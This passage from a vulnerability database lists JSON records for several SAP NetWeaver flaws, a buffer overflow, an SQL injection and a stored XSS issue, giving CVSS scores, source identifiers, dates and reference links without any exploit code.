"db": "NVD",
"id": "CVE-2012-2511"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20705",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2511"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2511",
"trust": 2.9
},
{
"db": "SECTRACK",
"id": "1027052",
"trust": 1.1
},
{
"db": "BID",
"id": "53424",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "48980",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "19579",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "20705",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2511",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112569",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112538",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"id": "VAR-201205-0129",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.2949160133333333
},
"last_update_date": "2023-12-18T12:22:02.527000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "NVD",
"id": "CVE-2012-2511"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1027052"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75453"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2511"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2511"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/53424"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/48980"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/19579"
},
{
"trust": 0.4,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20705/"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi_30_beta_launch"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/services-overview-core-security-consulting-services."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2511"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1516"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1517"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2513"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/corelabs-advisories"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2514"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1687910."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2512"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46."
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"date": "2012-05-08T00:00:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"date": "2012-05-09T07:38:14",
"db": "PACKETSTORM",
"id": "112569"
},
{
"date": "2012-05-08T15:15:15",
"db": "PACKETSTORM",
"id": "112538"
},
{
"date": "2012-05-15T04:21:43.330000",
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"date": "2012-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"date": "2012-09-04T05:50:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"date": "2017-08-29T01:31:37.337000",
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of DiagTraceAtoms Service disruption in functions ( Daemon crash ) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
],
"trust": 0.6
}
}
var-201309-0329
Vulnerability from variot
SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to "ABAD0_DELETE_DERIVATION_TABLE.". Because some of the input passed to the \"ABAD0_DELETE_DERIVATION_TABLE\" function fails to filter properly before using the SQL query, the remote attacker manipulates the SQL query by injecting arbitrary SQL code. SAP NetWeaver is a set of service-oriented integrated application platform of German SAP company. The platform provides a development and runtime environment for SAP applications. The vulnerability stems from insufficient filtering of user-submitted data before the program constructs SQL query statements. Attackers can use this vulnerability to manipulate SQL query logic to perform unauthorized operations in the underlying database. There are vulnerabilities in SAP NetWeaver 7.30, other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201309-0329",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 3.5,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "BID",
"id": "62147"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5723"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin of ERPScan",
"sources": [
{
"db": "BID",
"id": "62147"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
}
],
"trust": 0.9
},
"cve": "CVE-2013-5723",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-5723",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-12896",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "01277918-1f0d-11e6-abef-000c29c66e3d",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-5723",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-12896",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201309-171",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-5723",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "VULMON",
"id": "CVE-2013-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to \"ABAD0_DELETE_DERIVATION_TABLE.\". Because some of the input passed to the \\\"ABAD0_DELETE_DERIVATION_TABLE\\\" function fails to filter properly before using the SQL query, the remote attacker manipulates the SQL query by injecting arbitrary SQL code. SAP NetWeaver is a set of service-oriented integrated application platform of German SAP company. The platform provides a development and runtime environment for SAP applications. The vulnerability stems from insufficient filtering of user-submitted data before the program constructs SQL query statements. Attackers can use this vulnerability to manipulate SQL query logic to perform unauthorized operations in the underlying database. There are vulnerabilities in SAP NetWeaver 7.30, other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "BID",
"id": "62147"
},
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2013-5723"
}
],
"trust": 3.24
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "62147",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2013-5723",
"trust": 2.5
},
{
"db": "OSVDB",
"id": "96900",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "54702",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1029018",
"trust": 1.1
},
{
"db": "CNVD",
"id": "CNVD-2013-12896",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171",
"trust": 0.6
},
{
"db": "IVD",
"id": "01277918-1F0D-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2013-5723",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "VULMON",
"id": "CVE-2013-5723"
},
{
"db": "BID",
"id": "62147"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"id": "VAR-201309-0329",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
}
]
},
"last_update_date": "2023-12-18T13:14:55.074000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers (SAP Security Note 1840249)",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver \u0027ABAD0_DELETE_DERIVATION_TABLE\u0027 function SQL injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/39364"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "NVD",
"id": "CVE-2013-5723"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://secunia.com/advisories/54702"
},
{
"trust": 1.7,
"url": "http://osvdb.org/96900"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1840249"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/62147"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1029018"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5723"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5723"
},
{
"trust": 0.6,
"url": "http://www.securelist.com/en/advisories/54702"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=30800"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "VULMON",
"id": "CVE-2013-5723"
},
{
"db": "BID",
"id": "62147"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"db": "VULMON",
"id": "CVE-2013-5723"
},
{
"db": "BID",
"id": "62147"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-09T00:00:00",
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"date": "2013-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"date": "2013-09-12T00:00:00",
"db": "VULMON",
"id": "CVE-2013-5723"
},
{
"date": "2013-08-20T00:00:00",
"db": "BID",
"id": "62147"
},
{
"date": "2013-09-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"date": "2013-09-12T13:31:15.587000",
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"date": "2013-08-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"date": "2013-09-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12896"
},
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2013-5723"
},
{
"date": "2013-08-20T00:00:00",
"db": "BID",
"id": "62147"
},
{
"date": "2013-09-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004089"
},
{
"date": "2018-12-10T19:29:00.903000",
"db": "NVD",
"id": "CVE-2013-5723"
},
{
"date": "2013-09-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"date": "2013-09-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u2018 ABAD0_DELETE_DERIVATION_TABLE \u0027function SQL Injection vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "IVD",
"id": "01277918-1f0d-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-065"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-171"
}
],
"trust": 1.4
}
}
var-202002-1432
Vulnerability from variot
Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability. SAP NetWeaver and SAP S/4HANA Exists in a cross-site scripting vulnerability.Information may be obtained and tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
